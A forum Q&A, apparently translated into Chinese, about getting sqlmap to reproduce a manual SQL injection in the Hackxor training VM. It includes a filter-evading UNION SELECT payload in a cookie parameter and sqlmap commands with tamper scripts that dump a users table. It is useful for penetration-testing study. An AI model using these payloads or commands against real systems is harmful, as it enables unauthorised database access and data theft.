Sqlmap 没有利用经过验证的 SQL 注入

信息安全 渗透测试 sql注入 sqlmap
2021-08-17 06:07:36

现在我正在修补Hackxor VM(一个渗透训练环境),我正在尝试使用 sqlmap 来利用我可以手动利用的漏洞。

该漏洞存在于 cookie 标头“userid”参数中。该应用程序实现了一些 SQLi 过滤器来阻止空格和一些 SQL 关键字,因此您必须对有效负载进行一些卷积。

我可以通过 HTTP 代理成功利用在提到的“userid”参数中注入以下有效负载的漏洞:

71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users

然后我尝试使用以下命令复制使用 sqlmap 的注入,但没有成功:

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"

我希望 sqlmap注入给定的查询并返回一个成功的漏洞利用,但是 sqlmap 尝试了很多查询,最后返回的 'userid' 参数不会受到攻击。

我究竟做错了什么?

2个回答

我实际上遇到了类似的问题。虽然我的语法是正确的,但我仍然不知道哪里出错了,但我能够使用 -r 标志并将捕获的 HTTP 标头作为参数提供给 sqlmap。一旦我这样做了,这个 sqlmap 将该字段识别为易受攻击的字段(我已经知道它是)并按照我最初的想法行事。

SQLmap POST 参数“txtLoginID”不可注入

希望这可以帮助!

它需要以这种方式工作

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" --level 5 --risk 3 -p "userid" --tamper=nonrecursivereplacement,space2comment --sql-query="71934 UNION SELECT * from users"